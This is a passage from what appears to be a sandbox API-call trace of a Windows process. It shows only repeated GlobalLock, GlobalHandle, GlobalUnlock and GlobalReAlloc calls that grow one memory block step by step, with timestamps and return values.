[0187.908] GlobalUnlock (hMem=0x68000c) returned 0
[0187.908] GlobalReAlloc (hMem=0x68000c, dwBytes=0x44000, uFlags=0x2) returned 0x68000c
[0187.908] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.909] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.909] GlobalUnlock (hMem=0x68000c) returned 0
[0187.909] GlobalReAlloc (hMem=0x68000c, dwBytes=0x46000, uFlags=0x2) returned 0x68000c
[0187.909] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.909] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.909] GlobalUnlock (hMem=0x68000c) returned 0
[0187.909] GlobalReAlloc (hMem=0x68000c, dwBytes=0x48000, uFlags=0x2) returned 0x68000c
[0187.909] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.909] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.910] GlobalUnlock (hMem=0x68000c) returned 0
[0187.910] GlobalReAlloc (hMem=0x68000c, dwBytes=0x4a000, uFlags=0x2) returned 0x68000c
[0187.910] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.910] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.910] GlobalUnlock (hMem=0x68000c) returned 0
[0187.910] GlobalReAlloc (hMem=0x68000c, dwBytes=0x4c000, uFlags=0x2) returned 0x68000c
[0187.910] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.910] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.911] GlobalUnlock (hMem=0x68000c) returned 0
[0187.911] GlobalReAlloc (hMem=0x68000c, dwBytes=0x4e000, uFlags=0x2) returned 0x68000c
[0187.911] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.911] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.911] GlobalUnlock (hMem=0x68000c) returned 0
[0187.911] GlobalReAlloc (hMem=0x68000c, dwBytes=0x50000, uFlags=0x2) returned 0x68000c
[0187.911] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.912] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.912] GlobalUnlock (hMem=0x68000c) returned 0
[0187.912] GlobalReAlloc (hMem=0x68000c, dwBytes=0x52000, uFlags=0x2) returned 0x68000c
[0187.912] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.912] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.912] GlobalUnlock (hMem=0x68000c) returned 0
[0187.912] GlobalReAlloc (hMem=0x68000c, dwBytes=0x54000, uFlags=0x2) returned 0x68000c
[0187.912] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.913] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.913] GlobalUnlock (hMem=0x68000c) returned 0
[0187.913] GlobalReAlloc (hMem=0x68000c, dwBytes=0x56000, uFlags=0x2) returned 0x68000c
[0187.913] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.913] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.913] GlobalUnlock (hMem=0x68000c) returned 0
[0187.913] GlobalReAlloc (hMem=0x68000c, dwBytes=0x58000, uFlags=0x2) returned 0x68000c
[0187.913] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.914] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.914] GlobalUnlock (hMem=0x68000c) returned 0
[0187.914] GlobalReAlloc (hMem=0x68000c, dwBytes=0x5a000, uFlags=0x2) returned 0x68000c
[0187.914] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.915] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.915] GlobalUnlock (hMem=0x68000c) returned 0
[0187.915] GlobalReAlloc (hMem=0x68000c, dwBytes=0x5c000, uFlags=0x2) returned 0x68000c
[0187.915] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.915] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.915] GlobalUnlock (hMem=0x68000c) returned 0
[0187.915] GlobalReAlloc (hMem=0x68000c, dwBytes=0x5e000, uFlags=0x2) returned 0x68000c
[0187.915] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.916] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.916] GlobalUnlock (hMem=0x68000c) returned 0
[0187.916] GlobalReAlloc (hMem=0x68000c, dwBytes=0x60000, uFlags=0x2) returned 0x68000c
[0187.916] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.916] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.916] GlobalUnlock (hMem=0x68000c) returned 0
[0187.916] GlobalReAlloc (hMem=0x68000c, dwBytes=0x62000, uFlags=0x2) returned 0x68000c
[0187.916] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.917] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.917] GlobalUnlock (hMem=0x68000c) returned 0
[0187.917] GlobalReAlloc (hMem=0x68000c, dwBytes=0x64000, uFlags=0x2) returned 0x68000c
[0187.917] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.917] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.917] GlobalUnlock (hMem=0x68000c) returned 0
[0187.917] GlobalReAlloc (hMem=0x68000c, dwBytes=0x66000, uFlags=0x2) returned 0x68000c
[0187.917] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.918] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.918] GlobalUnlock (hMem=0x68000c) returned 0
[0187.918] GlobalReAlloc (hMem=0x68000c, dwBytes=0x68000, uFlags=0x2) returned 0x68000c
[0187.918] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.918] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.918] GlobalUnlock (hMem=0x68000c) returned 0
[0187.918] GlobalReAlloc (hMem=0x68000c, dwBytes=0x6a000, uFlags=0x2) returned 0x68000c
[0187.918] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.919] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.919] GlobalUnlock (hMem=0x68000c) returned 0
[0187.919] GlobalReAlloc (hMem=0x68000c, dwBytes=0x6c000, uFlags=0x2) returned 0x68000c
[0187.922] GlobalLock (hMem=0x68000c) returned 0x350820
[0187.923] GlobalHandle (pMem=0x350820) returned 0x68000c
[0187.923] GlobalUnlock (hMem=0x68000c) returned 0
[0187.923] GlobalReAlloc (hMem=0x68000c, dwBytes=0x6e000, uFlags=0x2) returned 0x68000c
[0187.923] GlobalLock (hMem=0x68000c) returned 0x350820
[0187.923] GlobalHandle (pMem=0x350820) returned 0x68000c
[0187.923] GlobalUnlock (hMem=0x68000c) returned 0
[0187.923] GlobalReAlloc (hMem=0x68000c, dwBytes=0x70000, uFlags=0x2) returned 0x68000c
[0187.935] GlobalLock (hMem=0x68000c) returned 0xa10048
[0187.936] GlobalHandle (pMem=0xa10048) returned 0x68000c
[0187.936] GlobalUnlock (hMem=0x68000c) returned 0
[0187.936] GlobalReAlloc (hMem=0x68000c, dwBytes=0x72000, uFlags=0x2) returned 0x68000c
[0187.940] GlobalLock (hMem=0x68000c) returned 0xa80058
[0187.941] GlobalHandle (pMem=0xa80058) returned 0x68000c
[0187.941] GlobalUnlock (hMem=0x68000c) returned 0
[0187.941] GlobalReAlloc (hMem=0x68000c, dwBytes=0x74000, uFlags=0x2) returned 0x68000c
[0187.941] GlobalLock (hMem=0x68000c) returned 0xa80058
[0187.942] GlobalHandle (pMem=0xa80058) returned 0x68000c
[0187.942] GlobalUnlock (hMem=0x68000c) returned 0
[0187.942] GlobalReAlloc (hMem=0x68000c, dwBytes=0x76000, uFlags=0x2) returned 0x68000c
[0187.954] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.954] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.954] GlobalUnlock (hMem=0x68000c) returned 0
[0187.954] GlobalReAlloc (hMem=0x68000c, dwBytes=0x78000, uFlags=0x2) returned 0x68000c
[0187.959] GlobalLock (hMem=0x68000c) returned 0xa10048
[0187.959] GlobalHandle (pMem=0xa10048) returned 0x68000c
[0187.959] GlobalUnlock (hMem=0x68000c) returned 0
[0187.960] GlobalReAlloc (hMem=0x68000c, dwBytes=0x7a000, uFlags=0x2) returned 0x68000c
[0187.964] GlobalLock (hMem=0x68000c) returned 0xa88058
[0187.964] GlobalHandle (pMem=0xa88058) returned 0x68000c
[0187.964] GlobalUnlock (hMem=0x68000c) returned 0
[0187.964] GlobalReAlloc (hMem=0x68000c, dwBytes=0x7c000, uFlags=0x2) returned 0x68000c
[0187.964] GlobalLock (hMem=0x68000c) returned 0xa88058
[0187.965] GlobalHandle (pMem=0xa88058) returned 0x68000c
[0187.965] GlobalUnlock (hMem=0x68000c) returned 0
[0187.965] GlobalReAlloc (hMem=0x68000c, dwBytes=0x7e000, uFlags=0x2) returned 0x68000c
[0187.978] GlobalLock (hMem=0x68000c) returned 0x2630048
[0187.979] GlobalHandle (pMem=0x2630048) returned 0x68000c
[0187.979] GlobalUnlock (hMem=0x68000c) returned 0
[0187.979] GlobalReAlloc (hMem=0x68000c, dwBytes=0x80000, uFlags=0x2) returned 0x68000c
[0188.003] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.004] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.004] GlobalUnlock (hMem=0x68000c) returned 0
[0188.004] GlobalReAlloc (hMem=0x68000c, dwBytes=0x82000, uFlags=0x2) returned 0x68000c
[0188.013] GlobalLock (hMem=0x68000c) returned 0xba0020
[0188.013] GlobalHandle (pMem=0xba0020) returned 0x68000c
[0188.013] GlobalUnlock (hMem=0x68000c) returned 0
[0188.013] GlobalReAlloc (hMem=0x68000c, dwBytes=0x84000, uFlags=0x2) returned 0x68000c
[0188.022] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.023] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.023] GlobalUnlock (hMem=0x68000c) returned 0
[0188.023] GlobalReAlloc (hMem=0x68000c, dwBytes=0x86000, uFlags=0x2) returned 0x68000c
[0188.032] GlobalLock (hMem=0x68000c) returned 0xba0020
[0188.033] GlobalHandle (pMem=0xba0020) returned 0x68000c
[0188.033] GlobalUnlock (hMem=0x68000c) returned 0
[0188.033] GlobalReAlloc (hMem=0x68000c, dwBytes=0x88000, uFlags=0x2) returned 0x68000c
[0188.042] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.043] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.043] GlobalUnlock (hMem=0x68000c) returned 0
[0188.043] GlobalReAlloc (hMem=0x68000c, dwBytes=0x8a000, uFlags=0x2) returned 0x68000c
[0188.052] GlobalLock (hMem=0x68000c) returned 0xba0020
[0188.053] GlobalHandle (pMem=0xba0020) returned 0x68000c
[0188.053] GlobalUnlock (hMem=0x68000c) returned 0
[0188.053] GlobalReAlloc (hMem=0x68000c, dwBytes=0x8c000, uFlags=0x2) returned 0x68000c
[0188.062] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.063] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.063] GlobalUnlock (hMem=0x68000c) returned 0
[0188.063] GlobalReAlloc (hMem=0x68000c, dwBytes=0x8e000, uFlags=0x2) returned 0x68000c
[0188.072] GlobalLock (hMem=0x68000c) returned 0xba0020
[0188.073] GlobalHandle (pMem=0xba0020) returned 0x68000c
[0188.073] GlobalUnlock (hMem=0x68000c) returned 0
[0188.073] GlobalReAlloc (hMem=0x68000c, dwBytes=0x90000, uFlags=0x2) returned 0x68000c
[0188.082] GlobalLock (hMem=0x68000c) returned 0xc30020
[0188.083] GlobalHandle (pMem=0xc30020) returned 0x68000c
[0188.083] GlobalUnlock (hMem=0x68000c) returned 0
[0188.083] GlobalReAlloc (hMem=0x68000c, dwBytes=0x92000, uFlags=0x2) returned 0x68000c
[0188.093] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.093] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.093] GlobalUnlock (hMem=0x68000c) returned 0
[0188.093] GlobalReAlloc (hMem=0x68000c, dwBytes=0x94000, uFlags=0x2) returned 0x68000c
[0188.104] GlobalLock (hMem=0x68000c) returned 0xbb0020
[0188.104] GlobalHandle (pMem=0xbb0020) returned 0x68000c
[0188.105] GlobalUnlock (hMem=0x68000c) returned 0
[0188.105] GlobalReAlloc (hMem=0x68000c, dwBytes=0x96000, uFlags=0x2) returned 0x68000c
[0188.117] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.118] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.118] GlobalUnlock (hMem=0x68000c) returned 0
[0188.118] GlobalReAlloc (hMem=0x68000c, dwBytes=0x98000, uFlags=0x2) returned 0x68000c
[0188.128] GlobalLock (hMem=0x68000c) returned 0xbb0020
[0188.129] GlobalHandle (pMem=0xbb0020) returned 0x68000c
[0188.129] GlobalUnlock (hMem=0x68000c) returned 0
[0188.129] GlobalReAlloc (hMem=0x68000c, dwBytes=0x9a000, uFlags=0x2) returned 0x68000c
[0188.139] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.140] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.140] GlobalUnlock (hMem=0x68000c) returned 0
[0188.140] GlobalReAlloc (hMem=0x68000c, dwBytes=0x9c000, uFlags=0x2) returned 0x68000c
[0188.150] GlobalLock (hMem=0x68000c) returned 0xbb0020
[0188.151] GlobalHandle (pMem=0xbb0020) returned 0x68000c
[0188.151] GlobalUnlock (hMem=0x68000c) returned 0
[0188.151] GlobalReAlloc (hMem=0x68000c, dwBytes=0x9e000, uFlags=0x2) returned 0x68000c
[0188.161] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.162] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.162] GlobalUnlock (hMem=0x68000c) returned 0
[0188.162] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa0000, uFlags=0x2) returned 0x68000c
[0188.173] GlobalLock (hMem=0x68000c) returned 0xbb0020
[0188.173] GlobalHandle (pMem=0xbb0020) returned 0x68000c
[0188.173] GlobalUnlock (hMem=0x68000c) returned 0
[0188.173] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa2000, uFlags=0x2) returned 0x68000c
[0188.184] GlobalLock (hMem=0x68000c) returned 0x2830020
[0188.185] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0188.185] GlobalUnlock (hMem=0x68000c) returned 0
[0188.185] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa4000, uFlags=0x2) returned 0x68000c
[0188.196] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.197] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.197] GlobalUnlock (hMem=0x68000c) returned 0
[0188.198] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa6000, uFlags=0x2) returned 0x68000c
[0188.208] GlobalLock (hMem=0x68000c) returned 0xbc0020
[0188.209] GlobalHandle (pMem=0xbc0020) returned 0x68000c
[0188.209] GlobalUnlock (hMem=0x68000c) returned 0
[0188.209] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa8000, uFlags=0x2) returned 0x68000c
[0188.221] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.222] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.222] GlobalUnlock (hMem=0x68000c) returned 0
[0188.222] GlobalReAlloc (hMem=0x68000c, dwBytes=0xaa000, uFlags=0x2) returned 0x68000c
[0188.233] GlobalLock (hMem=0x68000c) returned 0xbc0020
[0188.234] GlobalHandle (pMem=0xbc0020) returned 0x68000c
[0188.234] GlobalUnlock (hMem=0x68000c) returned 0
[0188.234] GlobalReAlloc (hMem=0x68000c, dwBytes=0xac000, uFlags=0x2) returned 0x68000c
[0188.246] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.247] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.247] GlobalUnlock (hMem=0x68000c) returned 0
[0188.247] GlobalReAlloc (hMem=0x68000c, dwBytes=0xae000, uFlags=0x2) returned 0x68000c
[0188.260] GlobalLock (hMem=0x68000c) returned 0xbc0020
[0188.260] GlobalHandle (pMem=0xbc0020) returned 0x68000c
[0188.260] GlobalUnlock (hMem=0x68000c) returned 0
[0188.260] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb0000, uFlags=0x2) returned 0x68000c
[0188.272] GlobalLock (hMem=0x68000c) returned 0x2830020
[0188.273] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0188.273] GlobalUnlock (hMem=0x68000c) returned 0
[0188.273] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb2000, uFlags=0x2) returned 0x68000c
[0188.285] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.286] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.286] GlobalUnlock (hMem=0x68000c) returned 0
[0188.286] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb4000, uFlags=0x2) returned 0x68000c
[0188.298] GlobalLock (hMem=0x68000c) returned 0xbd0020
[0188.298] GlobalHandle (pMem=0xbd0020) returned 0x68000c
[0188.298] GlobalUnlock (hMem=0x68000c) returned 0
[0188.298] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb6000, uFlags=0x2) returned 0x68000c
[0188.311] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.312] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.312] GlobalUnlock (hMem=0x68000c) returned 0
[0188.312] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb8000, uFlags=0x2) returned 0x68000c
[0188.325] GlobalLock (hMem=0x68000c) returned 0xbd0020
[0188.326] GlobalHandle (pMem=0xbd0020) returned 0x68000c
[0188.326] GlobalUnlock (hMem=0x68000c) returned 0
[0188.326] GlobalReAlloc (hMem=0x68000c, dwBytes=0xba000, uFlags=0x2) returned 0x68000c
[0188.338] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.339] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.339] GlobalUnlock (hMem=0x68000c) returned 0
[0188.339] GlobalReAlloc (hMem=0x68000c, dwBytes=0xbc000, uFlags=0x2) returned 0x68000c
[0188.352] GlobalLock (hMem=0x68000c) returned 0xbd0020
[0188.353] GlobalHandle (pMem=0xbd0020) returned 0x68000c
[0188.353] GlobalUnlock (hMem=0x68000c) returned 0
[0188.353] GlobalReAlloc (hMem=0x68000c, dwBytes=0xbe000, uFlags=0x2) returned 0x68000c
[0188.366] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.367] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.367] GlobalUnlock (hMem=0x68000c) returned 0
[0188.367] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc0000, uFlags=0x2) returned 0x68000c
[0188.379] GlobalLock (hMem=0x68000c) returned 0xbd0020
[0188.380] GlobalHandle (pMem=0xbd0020) returned 0x68000c
[0188.380] GlobalUnlock (hMem=0x68000c) returned 0
[0188.380] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc2000, uFlags=0x2) returned 0x68000c
[0188.393] GlobalLock (hMem=0x68000c) returned 0x2830020
[0188.394] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0188.394] GlobalUnlock (hMem=0x68000c) returned 0
[0188.394] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc4000, uFlags=0x2) returned 0x68000c
[0188.454] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.455] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.455] GlobalUnlock (hMem=0x68000c) returned 0
[0188.455] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc6000, uFlags=0x2) returned 0x68000c
[0188.468] GlobalLock (hMem=0x68000c) returned 0xbe0020
[0188.469] GlobalHandle (pMem=0xbe0020) returned 0x68000c
[0188.469] GlobalUnlock (hMem=0x68000c) returned 0
[0188.469] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc8000, uFlags=0x2) returned 0x68000c
[0188.482] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.482] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.483] GlobalUnlock (hMem=0x68000c) returned 0
[0188.483] GlobalReAlloc (hMem=0x68000c, dwBytes=0xca000, uFlags=0x2) returned 0x68000c
[0188.499] GlobalLock (hMem=0x68000c) returned 0xbe0020
[0188.500] GlobalHandle (pMem=0xbe0020) returned 0x68000c
[0188.500] GlobalUnlock (hMem=0x68000c) returned 0
[0188.500] GlobalReAlloc (hMem=0x68000c, dwBytes=0xcc000, uFlags=0x2) returned 0x68000c
[0188.514] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.515] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.515] GlobalUnlock (hMem=0x68000c) returned 0
[0188.515] GlobalReAlloc (hMem=0x68000c, dwBytes=0xce000, uFlags=0x2) returned 0x68000c
[0188.528] GlobalLock (hMem=0x68000c) returned 0xbe0020
[0188.529] GlobalHandle (pMem=0xbe0020) returned 0x68000c
[0188.529] GlobalUnlock (hMem=0x68000c) returned 0
[0188.529] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd0000, uFlags=0x2) returned 0x68000c
[0188.595] GlobalLock (hMem=0x68000c) returned 0x2830020
[0188.596] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0188.596] GlobalUnlock (hMem=0x68000c) returned 0
[0188.596] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd2000, uFlags=0x2) returned 0x68000c
[0188.611] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.612] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.612] GlobalUnlock (hMem=0x68000c) returned 0
[0188.612] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd4000, uFlags=0x2) returned 0x68000c
[0188.627] GlobalLock (hMem=0x68000c) returned 0xbf0020
[0188.628] GlobalHandle (pMem=0xbf0020) returned 0x68000c
[0188.628] GlobalUnlock (hMem=0x68000c) returned 0
[0188.628] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd6000, uFlags=0x2) returned 0x68000c
[0188.643] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.644] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.644] GlobalUnlock (hMem=0x68000c) returned 0
[0188.644] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd8000, uFlags=0x2) returned 0x68000c
[0188.659] GlobalLock (hMem=0x68000c) returned 0xbf0020
[0188.659] GlobalHandle (pMem=0xbf0020) returned 0x68000c
[0188.659] GlobalUnlock (hMem=0x68000c) returned 0
[0188.659] GlobalReAlloc (hMem=0x68000c, dwBytes=0xda000, uFlags=0x2) returned 0x68000c
[0188.674] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.674] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.674] GlobalUnlock (hMem=0x68000c) returned 0
[0188.674] GlobalReAlloc (hMem=0x68000c, dwBytes=0xdc000, uFlags=0x2) returned 0x68000c
[0188.706] GlobalLock (hMem=0x68000c) returned 0xbf0020
[0188.707] GlobalHandle (pMem=0xbf0020) returned 0x68000c
[0188.707] GlobalUnlock (hMem=0x68000c) returned 0
[0188.707] GlobalReAlloc (hMem=0x68000c, dwBytes=0xde000, uFlags=0x2) returned 0x68000c
[0188.723] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.723] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.724] GlobalUnlock (hMem=0x68000c) returned 0
[0188.724] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe0000, uFlags=0x2) returned 0x68000c
[0188.786] GlobalLock (hMem=0x68000c) returned 0xbf0020
[0188.786] GlobalHandle (pMem=0xbf0020) returned 0x68000c
[0188.786] GlobalUnlock (hMem=0x68000c) returned 0
[0188.786] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe2000, uFlags=0x2) returned 0x68000c
[0188.802] GlobalLock (hMem=0x68000c) returned 0x2830020
[0188.802] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0188.802] GlobalUnlock (hMem=0x68000c) returned 0
[0188.803] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe4000, uFlags=0x2) returned 0x68000c
[0188.818] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.819] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.819] GlobalUnlock (hMem=0x68000c) returned 0
[0188.819] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe6000, uFlags=0x2) returned 0x68000c
[0188.880] GlobalLock (hMem=0x68000c) returned 0xc00020
[0188.881] GlobalHandle (pMem=0xc00020) returned 0x68000c
[0188.881] GlobalUnlock (hMem=0x68000c) returned 0
[0188.881] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe8000, uFlags=0x2) returned 0x68000c
[0188.897] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.898] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.898] GlobalUnlock (hMem=0x68000c) returned 0
[0188.898] GlobalReAlloc (hMem=0x68000c, dwBytes=0xea000, uFlags=0x2) returned 0x68000c
[0188.913] GlobalLock (hMem=0x68000c) returned 0xc00020
[0188.914] GlobalHandle (pMem=0xc00020) returned 0x68000c
[0188.914] GlobalUnlock (hMem=0x68000c) returned 0
[0188.914] GlobalReAlloc (hMem=0x68000c, dwBytes=0xec000, uFlags=0x2) returned 0x68000c
[0188.977] GlobalLock (hMem=0x68000c) returned 0xb10020
[0188.978] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0188.978] GlobalUnlock (hMem=0x68000c) returned 0
[0188.978] GlobalReAlloc (hMem=0x68000c, dwBytes=0xee000, uFlags=0x2) returned 0x68000c
[0189.003] GlobalLock (hMem=0x68000c) returned 0xc00020
[0189.003] GlobalHandle (pMem=0xc00020) returned 0x68000c
[0189.004] GlobalUnlock (hMem=0x68000c) returned 0
[0189.004] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf0000, uFlags=0x2) returned 0x68000c
[0189.067] GlobalLock (hMem=0x68000c) returned 0x2830020
[0189.068] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0189.068] GlobalUnlock (hMem=0x68000c) returned 0
[0189.068] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf2000, uFlags=0x2) returned 0x68000c
[0189.083] GlobalLock (hMem=0x68000c) returned 0xb10020
[0189.084] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0189.084] GlobalUnlock (hMem=0x68000c) returned 0
[0189.084] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf4000, uFlags=0x2) returned 0x68000c
[0189.101] GlobalLock (hMem=0x68000c) returned 0x2830020
[0189.102] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0189.102] GlobalUnlock (hMem=0x68000c) returned 0
[0189.102] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf6000, uFlags=0x2) returned 0x68000c
[0189.165] GlobalLock (hMem=0x68000c) returned 0xb10020
[0189.166] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0189.166] GlobalUnlock (hMem=0x68000c) returned 0
[0189.166] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf8000, uFlags=0x2) returned 0x68000c
[0189.182] GlobalLock (hMem=0x68000c) returned 0x2830020
[0189.183] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0189.183] GlobalUnlock (hMem=0x68000c) returned 0
[0189.183] GlobalReAlloc (hMem=0x68000c, dwBytes=0xfa000, uFlags=0x2) returned 0x68000c
[0189.201] GlobalLock (hMem=0x68000c) returned 0xb10020
[0189.201] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0189.202] GlobalUnlock (hMem=0x68000c) returned 0
[0189.202] GlobalReAlloc (hMem=0x68000c, dwBytes=0xfc000, uFlags=0x2) returned 0x68000c
[0189.265] GlobalLock (hMem=0x68000c) returned 0x2830020
[0189.266] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0189.266] GlobalUnlock (hMem=0x68000c) returned 0
[0189.266] GlobalReAlloc (hMem=0x68000c, dwBytes=0xfe000, uFlags=0x2) returned 0x68000c
[0189.282] GlobalLock (hMem=0x68000c) returned 0xb10020
[0189.283] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0189.283] GlobalUnlock (hMem=0x68000c) returned 0
[0189.283] GlobalReAlloc (hMem=0x68000c, dwBytes=0x100000, uFlags=0x2) returned 0x68000c
[0189.347] GlobalLock (hMem=0x68000c) returned 0x2830020
[0189.348] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0189.348] GlobalUnlock (hMem=0x68000c) returned 0
[0189.348] GlobalReAlloc (hMem=0x68000c, dwBytes=0x102000, uFlags=0x2) returned 0x68000c
[0189.366] GlobalLock (hMem=0x68000c) returned 0xb10020
[0189.367] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0189.367] GlobalUnlock (hMem=0x68000c) returned 0
[0189.367] GlobalReAlloc (hMem=0x68000c, dwBytes=0x104000, uFlags=0x2) returned 0x68000c
[0189.384] GlobalLock (hMem=0x68000c) returned 0x2830020
[0189.384] GlobalHandle (pMem=0x2830020) returned 0x68000c
[0189.384] GlobalUnlock (hMem=0x68000c) returned 0
[0189.384] GlobalReAlloc (hMem=0x68000c, dwBytes=0x106000, uFlags=0x2) returned 0x68000c
[0189.449] GlobalLock (hMem=0x68000c) returned 0xb10020
[0189.449] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0189.449] GlobalUnlock (hMem=0x68000c) returned 0
[0189.449] GlobalReAlloc (hMem=0x68000c, dwBytes=0x108000, uFlags=0x2) returned 0x68000c
[0189.467] GlobalLock (hMem=0x68000c) returned 0x2830020
[0189.467] GlobalHandle (pMem=0x2830020) returned 0x68000c
